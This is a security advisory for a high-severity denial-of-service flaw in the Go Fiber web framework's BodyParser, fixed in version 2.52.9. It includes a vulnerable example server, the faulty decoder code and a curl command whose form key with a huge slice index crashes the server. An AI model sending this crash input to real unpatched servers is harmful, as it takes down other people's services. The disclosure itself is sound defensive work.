GHSA-qx2q-88mx-vhg7

Suggest an improvement
Source
https://github.com/advisories/GHSA-qx2q-88mx-vhg7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-qx2q-88mx-vhg7/GHSA-qx2q-88mx-vhg7.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qx2q-88mx-vhg7
Aliases
Related
Published
2025-08-05T15:22:21Z
Modified
2025-08-06T14:31:40Z
Severity
  • 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
Fiber Crashes in BodyParser Due to Unvalidated Large Slice Index in Decoder
Details

Description

When using Fiber's Ctx.BodyParser to parse form data containing a large numeric key that represents a slice index (e.g., test.18446744073704), the application crashes due to an out-of-bounds slice allocation in the underlying schema decoder.

The root cause is that the decoder attempts to allocate a slice of length idx + 1 without validating whether the index is within a safe or reasonable range. If idx is excessively large, this leads to an integer overflow or memory exhaustion, causing a panic or crash.

Steps to Reproduce

Create a POST request handler that accepts x-www-form-urlencoded data

package main

import (
    "fmt"
    "net/http"

    "github.com/gofiber/fiber/v2"
)

type RequestBody struct {
    NestedContent []*struct{} `form:"test"`
}

func main() {
    app := fiber.New()

    app.Post("/", func(c *fiber.Ctx) error {
        formData := RequestBody{}
        if err := c.BodyParser(&formData); err != nil {
            fmt.Println(err)
            return c.SendStatus(http.StatusUnprocessableEntity)
        }
        return nil
    })

    fmt.Println(app.Listen(":3000"))
}

Run the server and send a POST request with a large numeric key in form data, such as:

curl -v -X POST localhost:3000 --data-raw 'test.18446744073704' \
  -H 'Content-Type: application/x-www-form-urlencoded'

Relevant Code Snippet

Within the decoder's decode method:

idx := parts[0].index
if v.IsNil() || v.Len() < idx+1 {
    value := reflect.MakeSlice(t, idx+1, idx+1)  // <-- Panic/crash occurs here when idx is huge
    if v.Len() < idx+1 {
        reflect.Copy(value, v)
    }
    v.Set(value)
}

The idx is not validated before use, leading to unsafe slice allocation for extremely large values.


Impact

  • Application panic or crash on malicious or malformed input.
  • Potential denial of service (DoS) via memory exhaustion or server crash.
  • Lack of defensive checks in the parsing code causes instability.
Database specific
{
    "cwe_ids": [
        "CWE-789"
    ],
    "nvd_published_at": "2025-08-06T00:15:31Z",
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-05T15:22:21Z"
}
References

Affected packages

Go / github.com/gofiber/fiber/v2

Package

Name
github.com/gofiber/fiber/v2
View open source insights on deps.dev
Purl
pkg:golang/github.com/gofiber/fiber/v2

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.52.9

Database specific

{
    "last_known_affected_version_range": "<= 2.52.8"
}